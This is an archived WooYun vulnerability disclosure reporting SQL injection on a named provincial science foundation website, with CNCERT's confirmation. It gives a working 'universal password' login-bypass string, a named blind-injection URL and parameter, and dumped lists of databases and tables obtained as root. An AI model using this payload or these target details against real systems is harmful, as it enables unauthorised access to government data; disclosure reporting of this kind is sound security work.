当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104305

漏洞标题:某省自然科学基金委员会主站sql注射

相关厂商:cncert国家互联网应急中心

漏洞作者: 小健客

提交时间:2015-03-30 13:53

修复时间:2015-05-18 14:28

公开时间:2015-05-18 14:28

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:6

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-30: 细节已通知厂商并且等待厂商处理中
2015-04-03: 厂商已经确认,细节仅向厂商公开
2015-04-13: 细节向核心白帽子及相关领域专家公开
2015-04-23: 细节向普通白帽子公开
2015-05-03: 细节向实习白帽子公开
2015-05-18: 细节向公众公开

简要描述:

万能密码绕过登录进后台,同时后台也有注入点,root权限,同服上其他网站也遭殃了。

详细说明:

www.sdnsf.gov.cn
万能密码进入网站后台 用户名 admin' or 's'='s 密码随便写

1.png


登录处有基于时间的盲注,当前数据库用户 root@localhost,可跑出数据

available databases [32]:
[*] cason11
[*] conf
[*] emsfaq
[*] faq
[*] ias11
[*] information_schema
[*] isda2011
[*] ks
[*] ls
[*] mirlabscontact2
[*] mirmaillist
[*] mirmaillist2
[*] mysql
[*] nabi
[*] nabic11
[*] news
[*] nwesp11
[*] rolen
[*] sdjdkj
[*] sdnsffaq
[*] sdsrms
[*] share
[*] socpar
[*] socpros11
[*] stat
[*] survey
[*] survey2
[*] tech
[*] test
[*] test2
[*] wict11
[*] wx


当前数据库

Database: news
[10 tables]
+---------------------+
| user |
| bindata |
| class |
| counter |
| info_bin_relation |
| info_class_relation |
| information |
| log |
| user_class_relation |
| v_info |
+---------------------+


后台的注入点 http://www.sdnsf.gov.cn/portal/sims2003/echoinfo.php?id=437 同样是盲注
同一服务器上还有一个比较重要的站点: http://jytghc.ujn.edu.cn:8088

漏洞证明:

如上

修复方案:

版权声明:转载请注明来源 小健客@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-04-03 14:27

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论